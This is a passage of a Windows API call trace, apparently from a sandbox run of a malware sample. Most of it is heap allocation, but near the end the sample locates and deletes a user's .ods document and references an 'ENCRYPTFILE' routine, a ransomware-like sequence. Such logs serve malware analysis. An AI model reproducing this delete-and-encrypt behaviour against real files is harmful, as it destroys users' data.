0x43e2560 [0079.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.570] CloseHandle (hObject=0x258) returned 1 [0079.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.573] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb3b0 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.574] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.574] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.574] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.575] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.576] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.576] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.576] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.577] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods", lpFilePart=0x0) returned 0x33 [0079.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0079.577] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\iwvsvvmxlofdd1.ods")) returned 0x20 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0079.577] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.577] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d758 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0079.578] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d758 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0079.578] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.578] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e570, ftCreationTime.dwHighDateTime=0x1d5e391, ftLastAccessTime.dwLowDateTime=0xb4e09380, ftLastAccessTime.dwHighDateTime=0x1d5edc3, ftLastWriteTime.dwLowDateTime=0xb4e09380, ftLastWriteTime.dwHighDateTime=0x1d5edc3, nFileSizeHigh=0x0, nFileSizeLow=0x13f79, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="IWVSvvMxlOfdD1.ods", cAlternateFileName="IWVSVV~1.ODS")) returned 0x41ac600 [0079.578] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\IWVSvvMxlOfdD1.ods" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\iwvsvvmxlofdd1.ods")) returned 1 [0079.582] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2966e570, ftCreationTime.dwHighDateTime=0x1d5e391, ftLastAccessTime.dwLowDateTime=0xb4e09380, ftLastAccessTime.dwHighDateTime=0x1d5edc3, ftLastWriteTime.dwLowDateTime=0xb4e09380, ftLastWriteTime.dwHighDateTime=0x1d5edc3, nFileSizeHigh=0x0, nFileSizeLow=0x13f79, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="IWVSvvMxlOfdD1.ods", cAlternateFileName="IWVSVV~1.ODS")) returned 0 [0079.582] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dcf8 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.582] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0079.582] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.582] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0079.583] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.583] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.583] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.583] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b218f0 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.583] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.583] RtlAllocateHeap 